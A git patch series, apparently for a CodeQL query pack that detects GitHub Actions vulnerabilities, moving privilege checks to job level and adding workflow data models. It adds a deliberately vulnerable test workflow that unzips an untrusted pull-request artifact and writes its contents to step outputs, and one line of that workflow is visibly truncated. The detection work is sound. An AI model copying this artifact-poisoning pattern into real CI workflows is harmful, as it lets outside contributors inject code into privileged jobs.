ql/lib/codeql/actions/Ast.qll | 33 +--------- ql/lib/codeql/actions/ast/internal/Ast.qll | 63 +++++++++++++++++++ .../codeql/actions/dataflow/ExternalFlow.qll | 7 +++ .../internal/ExternalFlowExtensions.qll | 5 ++ .../ext/workflow-models/workflow-models.yml | 5 ++ ql/lib/qlpack.yml | 1 + ql/src/Security/CWE-077/EnvPathInjection.ql | 8 +-- ql/src/Security/CWE-077/EnvVarInjection.ql | 8 +-- .../CWE-077/PrivilegedEnvPathInjection.ql | 6 +- .../CWE-077/PrivilegedEnvVarInjection.ql | 6 +- ql/src/Security/CWE-078/CommandInjection.ql | 8 +-- .../CWE-078/PrivilegedCommandInjection.ql | 6 +- ql/src/Security/CWE-094/CodeInjection.ql | 8 +-- .../CWE-094/PrivilegedCodeInjection.ql | 6 +- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 8 +-- .../CWE-829/PrivilegedArtifactPoisoning.ql | 6 +- ql/test/library-tests/workflowenum.expected | 0 ql/test/library-tests/workflowenum.ql | 8 +++ ...ction.actual => EnvPathInjection.expected} | 0 .../.github/workflows/artifactpoisoning61.yml | 53 ++++++++++++++++ 22 files changed, 221 insertions(+), 66 deletions(-) create mode 100644 ql/lib/ext/workflow-models/workflow-models.yml create mode 100644 ql/test/library-tests/workflowenum.expected create mode 100644 ql/test/library-tests/workflowenum.ql rename ql/test/query-tests/Security/CWE-077/{EnvPathInjection.actual => EnvPathInjection.expected} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 0fcdd81ee3fd..e845ec9fd4fd 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -147,6 +147,13 @@ export async function codeqlDatabaseAnalyze( codeql_output, ]; + const extPackPath = process.env["EXTPACK_PATH"]; + const extPackName = process.env["EXTPACK_NAME"]; + if (extPackPath !== undefined && extPackName !== undefined) { + cmd.push("--additional-packs", extPackPath); + cmd.push("--extension-packs", extPackName); + } + // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; diff --git a/action.yml b/action.yml index 9281212ea24e..42141a1dd74a 100644 --- a/action.yml +++ b/action.yml @@ -18,10 +18,41 @@ inputs: description: "CodeQL Suite to run" default: "actions-code-scanning" + workflow-models: + description: "Workflow models" + required: false + runs: using: 'composite' steps: - - name: Do something with context + - name: Process workflow models + shell: bash + if: inputs.workflow-models + run: | + // Create QLPack directory + mkdir workflow-extpack + cd workflow-extpack + + // Store the extension pack file + cat > models.yml << 'EOF' + ${{ inputs.workflow-models }} + EOF + + // Create QLPack + cat > qlpack.yml << 'EOF' + name: local/workflow-models + library: true + extensionTargets: + githubsecuritylab/actions-all: '*' + dataExtensions: + - models.yml + EOF + + // Set env vars + echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV + echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV + + - name: Scan workflows shell: bash env: GITHUB_TOKEN: ${{ inputs.token }} @@ -29,5 +60,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} + EXTPACK_PATH: ${{ inputs.extpack-path }} + EXTPACK_NAME: ${{ inputs.extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index ac222741c025..7c4bf9aa8af0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -228,36 +228,7 @@ class Workflow extends AstNode instanceof WorkflowImpl { Strategy getStrategy() { result = super.getStrategy() } - predicate hasSingleTrigger(string trigger) { - this.getATriggerEvent() = trigger and - count(this.getATriggerEvent()) = 1 - } - - predicate isPrivileged() { - // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" - or - // The Workflow accesses a secret - exists(SecretsExpression expr | - expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" - ) - or - // The Workflow is triggered by an event other than `pull_request` - count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent() = ["pull_request", "workflow_call"] - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - this.hasSingleTrigger("workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = this.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - caller.isPrivileged() - ) - or - // The Workflow has multiple triggers so at least one is ont "pull_request" - count(this.getATriggerEvent()) > 1 - } + predicate isPrivileged() { super.isPrivileged() } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { @@ -325,6 +296,8 @@ abstract class Job extends AstNode instanceof JobImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + predicate isPrivileged() { super.isPrivileged() } } class LocalJob extends Job instanceof LocalJobImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index dff5f351a69b..7cc70c86d20d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1,6 +1,7 @@ private import codeql.actions.ast.internal.Yaml private import codeql.Locations private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.dataflow.ExternalFlow /** * Gets the length of each line in the StringValue . @@ -332,8 +333,40 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { /** Gets the permissions granted to this workflow. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + private predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(this.getATriggerEvent()) = 1 + } + /** Gets the strategy for this workflow. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + + /** Holds if the workflow is privileged. */ + predicate isPrivileged() { + // The Workflow has a permission to write to some scope + this.getPermissions().getAPermission() = "write" + or + // The Workflow accesses a secret + exists(SecretsExpressionImpl expr | + expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or + // The Workflow is triggered by an event other than `pull_request` + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJobImpl call, WorkflowImpl caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + caller.isPrivileged() + ) + or + // The Workflow has multiple triggers so at least one is not "pull_request" + count(this.getATriggerEvent()) > 1 + } } class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { @@ -597,6 +630,36 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the strategy for this job. */ StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + + /** Holds if the workflow is privileged. */ + predicate isPrivileged() { + // The job has a permission to write to some scope + this.getPermissions().getAPermission() = "write" + or + // The job accesses a secret + exists(SecretsExpressionImpl expr | + expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) + or + // The effective permissions have write access + exists(string path, string name, string secrets_source, string perms | + workflowDataModel(path, _, name, secrets_source, perms, _) and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") and + ( + secrets_source.trim().toLowerCase() = "actions" or + perms.toLowerCase().matches("%write%") + ) + ) + or + // The job has no expliclit permission, but the enclosing workflow is privileged + not exists(this.getPermissions()) and + not exists(SecretsExpressionImpl expr | + expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + ) and + // The enclosing workflow is privileged + this.getEnclosingWorkflow().isPrivileged() + } } class LocalJobImpl extends JobImpl { diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index cc7e4c633e31..5db10e7823ee 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -2,6 +2,13 @@ private import internal.ExternalFlowExtensions as Extensions private import codeql.actions.DataFlow private import actions +predicate workflowDataModel( + string path, string visibility, string job, string secrets_source, string permissions, + string runner +) { + Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) +} + /** * MaD sources * Fields: diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 8e8ce10bba9f..529f7721e71b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -22,3 +22,8 @@ extensible predicate summaryModel( extensible predicate sinkModel( string action, string version, string input, string kind, string provenance ); + +extensible predicate workflowDataModel( + string path, string visibility, string job, string secrets_source, string permissions, + string runner +); diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml new file mode 100644 index 000000000000..f9f983be6937 --- /dev/null +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -0,0 +1,5 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: workflowDataModel + data: [] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 94df84766b55..d4b4ca8fdeba 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -15,3 +15,4 @@ groups: dataExtensions: - ext/*.model.yml - ext/**/*.model.yml + - ext/workflow-models/workflow-models.yml diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql index 19b4cf6c01b1..720b7aed8cc4 100644 --- a/ql/src/Security/CWE-077/EnvPathInjection.ql +++ b/ql/src/Security/CWE-077/EnvPathInjection.ql @@ -20,11 +20,11 @@ from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 2fca3b324941..af3f2998cc9d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -20,11 +20,11 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql index e9f55d1cbb24..3e7c74ab895e 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql @@ -19,9 +19,9 @@ import EnvPathInjectionFlow::PathGraph from EnvPathInjectionFlow::PathNode source, EnvPathInjectionFlow::PathNode sink where EnvPathInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 1a32183bfb22..aac7568e6548 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -19,9 +19,9 @@ import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index de60141bb400..6ac15f83207a 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -20,11 +20,11 @@ from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql index bbfb226ecd1c..adb8f25f077a 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql @@ -19,9 +19,9 @@ import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index dc28cc2569ff..aa5bbfdf75a6 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -22,11 +22,11 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 9814df091dd7..d043bd930b6a 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -21,9 +21,9 @@ import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 19b007902bd0..c26862960d15 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -19,11 +19,11 @@ from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sin where ArtifactPoisoningFlow::flowPath(source, sink) and ( - exists(source.getNode().asExpr().getEnclosingCompositeAction()) + exists(sink.getNode().asExpr().getEnclosingCompositeAction()) or - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - not w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + not j.isPrivileged() ) ) select sink.getNode(), source, sink, diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql index cd6d5eeb1089..379babf35f82 100644 --- a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql @@ -18,9 +18,9 @@ import ArtifactPoisoningFlow::PathGraph from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where ArtifactPoisoningFlow::flowPath(source, sink) and - exists(Workflow w | - w = source.getNode().asExpr().getEnclosingWorkflow() and - w.isPrivileged() + exists(Job j | + j = sink.getNode().asExpr().getEnclosingJob() and + j.isPrivileged() ) select sink.getNode(), source, sink, "Potential privileged artifact poisoning in $@, which may be controlled by an external user.", diff --git a/ql/test/library-tests/workflowenum.expected b/ql/test/library-tests/workflowenum.expected new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/test/library-tests/workflowenum.ql b/ql/test/library-tests/workflowenum.ql new file mode 100644 index 000000000000..692d1eb706bc --- /dev/null +++ b/ql/test/library-tests/workflowenum.ql @@ -0,0 +1,8 @@ +import actions +import codeql.actions.dataflow.internal.ExternalFlowExtensions as Extensions + +from + string path, string visibility, string job, string secrets_source, string permissions, + string runner +where Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) +select visibility, path, job, secrets_source, permissions, runner diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual rename to ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml new file mode 100644 index 000000000000..dcc80c6e74f0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning61.yml @@ -0,0 +1,53 @@ +name: Dependency Tree Reporter +on: + workflow_run: + workflows: [ "Dependency Tree Input Builder" ] + types: + - completed + +permissions: {} + +jobs: + compare: + permissions: + actions: read + pull-requests: write + runs-on: ubuntu-latest + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + steps: + - name: Download artifacts + uses: actions/github-script@v7.0.1 + with: + script: | + var artifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + console.log(artifacts); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "input-artifacts" + })[0]; + var download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/input.zip', Buffer.from(download.data)); + - name: Set needed env vars in outputs + id: prepare + run: | + unzip input.zip + echo current directory contents + ls -al + + echo Reading PR number + tmp=$(> $GITHUB_OUTPUT + + - run: echo ${{ steps.prepare.outputs.pr }} From 17933cbb549184b3d4e8652104513ef3b1f3f20c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 23:30:22 +0200 Subject: [PATCH 212/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d4b4ca8fdeba..00b31b33bf55 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.15 +version: 0.0.16 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 60e21004b842..dc9c140e60f3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.15 +version: 0.0.16 groups: - actions - queries From f73571a7524193b3be87e65c72815f94490ef445 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 11:20:52 +0200 Subject: [PATCH 213/707] fix: fix shell comments --- action.yml | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/action.yml b/action.yml index 42141a1dd74a..9580cff83e8c 100644 --- a/action.yml +++ b/action.yml @@ -29,16 +29,25 @@ runs: shell: bash if: inputs.workflow-models run: | - // Create QLPack directory + # Create QLPack directory mkdir workflow-extpack cd workflow-extpack - // Store the extension pack file - cat > models.yml << 'EOF' + # Store the extension pack file + cat > models.json << 'EOF' ${{ inputs.workflow-models }} EOF - // Create QLPack + # Store the extension pack file + cat > models.yml << 'EOF' + extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: workflowDataModel + data: [] + EOF + + # Create QLPack cat > qlpack.yml << 'EOF' name: local/workflow-models library: true @@ -48,7 +57,7 @@ runs: - models.yml EOF - // Set env vars + # Set env vars echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV From a2ed07ec3525a4fc032f0d17a3ab9ed093bb01aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 12:43:23 +0200 Subject: [PATCH 214/707] Update scan action --- .github/action/dist/index.js | 11 ++++++++++- .github/action/package-lock.json | 14 +++++++------- .github/action/package.json | 2 +- .github/action/src/codeql.ts | 7 ++++++- action.yml | 15 +++------------ 5 files changed, 27 insertions(+), 22 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 4c98f1d63012..6f4a57b10fb8 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "githubsecuritylab/actions-all", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), @@ -28706,6 +28706,15 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { "--output", codeql_output, ]; + const extPackPath = process.env["EXTPACK_PATH"]; + const extPackName = process.env["EXTPACK_NAME"]; + if (extPackPath !== undefined && + extPackName !== undefined && + extPackPath !== "" && + extPackName !== "") { + cmd.push("--additional-packs", extPackPath); + cmd.push("--extension-packs", extPackName); + } // remote pack or local pack if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json index eef94f4b5cd8..9cacb7f9af9c 100644 --- a/.github/action/package-lock.json +++ b/.github/action/package-lock.json @@ -15,7 +15,7 @@ "@actions/tool-cache": "^2.0.1" }, "devDependencies": { - "@types/node": "^20.6.0", + "@types/node": "^20.12.7", "@vercel/ncc": "^0.38.0", "prettier": "^3.0.3", "typescript": "^5.2.2" @@ -195,9 +195,9 @@ } }, "node_modules/@types/node": { - "version": "20.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", - "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "version": "20.12.7", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", + "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", "dev": true, "dependencies": { "undici-types": "~5.26.4" @@ -520,9 +520,9 @@ } }, "@types/node": { - "version": "20.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", - "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "version": "20.12.7", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", + "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", "dev": true, "requires": { "undici-types": "~5.26.4" diff --git a/.github/action/package.json b/.github/action/package.json index 90512a3163ca..cd9021d20c5e 100644 --- a/.github/action/package.json +++ b/.github/action/package.json @@ -40,7 +40,7 @@ "@actions/tool-cache": "^2.0.1" }, "devDependencies": { - "@types/node": "^20.6.0", + "@types/node": "^20.12.7", "@vercel/ncc": "^0.38.0", "prettier": "^3.0.3", "typescript": "^5.2.2" diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index e845ec9fd4fd..b318cb1b3e2e 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -149,7 +149,12 @@ export async function codeqlDatabaseAnalyze( const extPackPath = process.env["EXTPACK_PATH"]; const extPackName = process.env["EXTPACK_NAME"]; - if (extPackPath !== undefined && extPackName !== undefined) { + if ( + extPackPath !== undefined && + extPackName !== undefined && + extPackPath !== "" && + extPackName !== "" + ) { cmd.push("--additional-packs", extPackPath); cmd.push("--extension-packs", extPackName); } diff --git a/action.yml b/action.yml index 9580cff83e8c..addc5588b8d6 100644 --- a/action.yml +++ b/action.yml @@ -33,18 +33,9 @@ runs: mkdir workflow-extpack cd workflow-extpack - # Store the extension pack file - cat > models.json << 'EOF' - ${{ inputs.workflow-models }} - EOF - # Store the extension pack file cat > models.yml << 'EOF' - extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: workflowDataModel - data: [] + ${{ inputs.workflow-models }} EOF # Create QLPack @@ -69,7 +60,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ inputs.extpack-path }} - EXTPACK_NAME: ${{ inputs.extpack-name }} + EXTPACK_PATH: ${{ env.EXTPACK_PATH }} + EXTPACK_NAME: ${{ env.EXTPACK_NAME }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 858df49012e2583ce58303cb74404ca9744aa2f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:08:27 +0200 Subject: [PATCH 215/707] Generate yaml file --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- action.yml | 10 ++++++++++ 3 files changed, 12 insertions(+), 2 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 6f4a57b10fb8..4a60299ef0fe 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-all", + pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index b318cb1b3e2e..842af1c8b177 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -24,7 +24,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "githubsecuritylab/actions-all", + pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/action.yml b/action.yml index addc5588b8d6..a9f9b2ad6cb8 100644 --- a/action.yml +++ b/action.yml @@ -52,6 +52,16 @@ runs: echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV + - name: Show contents + shell: bash + run: | + echo "Directory contents" + ls -la + echo "Models" + if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi + echo "QLPack" + if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + - name: Scan workflows shell: bash env: From 5cd8d70a9cfe2eb5521fd932585bf660c044ed53 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:09:06 +0200 Subject: [PATCH 216/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 00b31b33bf55..f6efd7fa0f1c 100644 --- a/ql/lib/qlpack.yml +++ 